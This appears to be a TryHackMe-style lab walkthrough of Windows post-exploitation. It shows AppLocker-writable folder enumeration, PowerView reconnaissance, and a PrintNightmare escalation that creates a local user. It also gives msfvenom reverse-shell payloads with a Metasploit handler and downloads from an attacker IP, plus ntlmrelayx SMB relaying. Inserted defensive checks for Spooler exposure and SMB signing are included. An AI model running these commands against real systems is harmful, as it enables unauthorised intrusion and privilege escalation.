if($_.'Bypasses Default AppLocker Rules')
{
    Add-MainIndex -YamlObject $_ -Outfile $mainpath"\VerifiedAppLockerBypasses.md"
}
else{
    Add-MainIndex -YamlObject $_ -Outfile $mainpath"\UnverifiedAppLockerBypasses.md"
}
}

However, what I used at first was:

$group = "*Users*"
$root_folder = "C:\windows"
write-output "[*] Processing folders recursively in $root_folder"
foreach($_ in (Get-ChildItem $root_folder -recurse -ErrorAction SilentlyContinue)){
    if($_.PSIsContainer)
    {
        try{
            $res = Get-acl $_.FullName
        } catch{
            continue
        }
        foreach ($a in $res.access){
            if ($a.IdentityReference -like $group){
                if ( ($a.FileSystemRights -like "*Write*" -or $a.FileSystemRights -like "*CreateFiles*" ) -and $a.FileSystemRights -like "*ReadAndExecute*" ){
                    write-host "[+] " $_.FullName -foregroundcolor "green"
                }
            }
        }
    }
}

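This gives us several locations that are not locked down.

Change to C:\windows\Tasks

and run again:

.\Seatbelt.exe -group=system

The result was yet another error. How annoying.

Next we take a look with PowerView.

Run Import-Module .\PowerView.ps1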

Get-DomainUser

更多请看

PowerView-3.0 tips and tricks (github.com)

Dr.korbinian推荐:

# enumerate/list all groups present on a local machine/computer
Get-NetLocalGroup

# enumerate/list all members of a local group such as users, computers, or service accounts
Get-NetLocalGroupMember

# enumerate/list all users currently logged onto the local machine/computer
Get-NetLoggedon

# enumerate/list the active directory domain GPOs installed on the local machine
Get-DomainGPO

# check all hosts connected to the domain and check if the current user or listed user is a local administrator
Find-LocalAdminAccess

# list/enumerate all the scheduled tasks present on the system
Get-ScheduledTask

# list/enumerate all the scheduled tasks present on the system which are located in the Users directory
Get-ScheduledTask -TaskPath "\Users\*"

# list specific information on specified Tasks allowing the attacker to identify the task and how it could be exploited
Get-ScheduledTaskInfo -TaskName <Full Path>

# enumerate a user's groups or all groups within the domain. If it throws an error, you need to run the upcoming command
Import-Module ActiveDirectory; Get-ADGroup

# only possible in elevated powershell window - enables the ActiveDirectory module
Add-WindowsFeature RSAT-AD-PowerShell

# retrieve the groups a user, computer group, or service account is a member of (also only works with the ActiveDirectory module)
Get-ADPrincipalGroupMembership

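Next we escalate privileges.

Honestly, working through everything above is a real pain, so Dr.korbinian recommended:

calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare) (github.com)

After all, the target machine is from 2020, so using a 2021 vulnerability against it is total overkill.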

git clone https://github.com/calebstewart/CVE-2021-1675

powershell.exe Invoke-WebRequest http://10.50.107.175/CVE-2021-1675.ps1 -outfile CVE-2021-1675.ps1

Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "Zacarx" -NewPassword "zacax9981!"
net user Zacarx
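
From the defender's side, the step above depends on a running Print Spooler and leaves a new local account behind. The following check is an added example, not part of the original post or of the referenced project: the function name Get-SpoolerExposure is hypothetical, the registry values are the Point and Print settings Microsoft documented for the PrintNightmare fixes, and event IDs 4720 and 4732 are the standard Security log records for account creation and local group membership changes.

```powershell
# Added defensive example; Get-SpoolerExposure is a hypothetical name.
function Get-SpoolerExposure {
    [CmdletBinding()]
    param(
        # Point and Print policy key; its values are absent when not configured.
        [string]$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    )
    $findings = @()

    # 1. A running spooler is the precondition for this class of bug.
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $status = 'NotInstalled'
    if ($svc) { $status = [string]$svc.Status }
    if ($status -eq 'Running') {
        $findings += 'Print Spooler is running; stop and disable it where printing is not needed.'
    }

    # 2. Policy values that relax printer-driver installation checks.
    $policy = Get-ItemProperty -Path $PolicyKey -ErrorAction SilentlyContinue
    $values = @{}
    foreach ($name in 'RestrictDriverInstallationToAdministrators',
                      'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
        $values[$name] = $null
        if ($policy -and $policy.PSObject.Properties[$name]) {
            $values[$name] = [int]$policy.$name
        }
    }
    if ($values['RestrictDriverInstallationToAdministrators'] -eq 0) {
        $findings += 'RestrictDriverInstallationToAdministrators = 0: non-administrators may install printer drivers.'
    }
    foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
        if ($values[$name]) { $findings += "$name = $($values[$name]): expected 0 or not configured." }
    }

    # 3. Accounts created (4720) or added to a local group (4732) in the last 24 hours.
    #    Reading the Security log needs elevation and account-management auditing.
    $filter = @{ LogName = 'Security'; Id = 4720, 4732; StartTime = (Get-Date).AddHours(-24) }
    $events = @(Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`n")[0].Trim() } })

    [pscustomobject]@{
        SpoolerStatus = $status
        PolicyValues  = $values
        Findings      = $findings
        AccountEvents = $events
    }
}
Get-SpoolerExposure | Format-List
```

An empty Findings list only means these settings are not weakened; whether the host carries the Microsoft patches for the Print Spooler issues still has to be checked separately.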

Next, we follow the TryHackMe route.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.107.175 LPORT=53 -f dll -o kavremoverENU.dll

set payload windows/meterpreter/reverse_tcp
set LHOST 10.50.107.175
set LPORT 53

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 53
msf6 exploit(multi/handler) > run

powershell.exe Invoke-WebRequest http://10.50.107.175/kavremoverENU.dll -outfile kavremoverENU.dll

nmap -p 445 --script smb2-security-mode 10.200.110.32 -Pn

Reference article

Principles and Implementation of NTLM-relay Attacks, Shanfenglan7's blog, CSDN

windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=53 -f exe > meterpreter_shell.exe

└─$ msfconsole -q 
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 53
msf6 exploit(multi/handler) > run

sudo ntlmrelayx.py -t smb://10.200.110.30 -smb2support -socks
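
Relaying to SMB only works against hosts that do not require SMB signing, which is what the smb2-security-mode scan above reports. The following parser is an added example, not part of the original post: the function name Get-SmbSigningFromNmap is hypothetical and the scan output is constructed sample data using documentation addresses. It turns saved nmap output into a list of hosts that still need signing enforced.

```powershell
# Added defensive example; function name and sample data are constructed.
function Get-SmbSigningFromNmap {
    param([Parameter(Mandatory)][string[]]$Lines)
    $current = $null
    foreach ($line in $Lines) {
        # "Nmap scan report for host (ip)" or "Nmap scan report for ip"
        if ($line -match '^Nmap scan report for (?:\S+ \()?([0-9.]+)\)?') {
            $current = $Matches[1]
            continue
        }
        # Result line of the smb2-security-mode script
        if ($current -and $line -match 'Message signing (.+)$') {
            $text = $Matches[1].Trim()
            [pscustomobject]@{
                Host     = $current
                Signing  = $text
                Required = ($text -match '^enabled and required')
            }
        }
    }
}

# Constructed sample of `nmap -p 445 --script smb2-security-mode` output
$sample = @'
Nmap scan report for 192.0.2.10
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
Nmap scan report for dc.example.test (192.0.2.20)
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
'@ -split '\r?\n'

# Hosts listed here accept unsigned SMB sessions. On each one, enforce signing with
#   Set-SmbServerConfiguration -RequireSecuritySignature $true
Get-SmbSigningFromNmap -Lines $sample | Where-Object { -not $_.Required }
```

With the constructed sample, only 192.0.2.10 is returned; the host that requires signing is filtered out.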
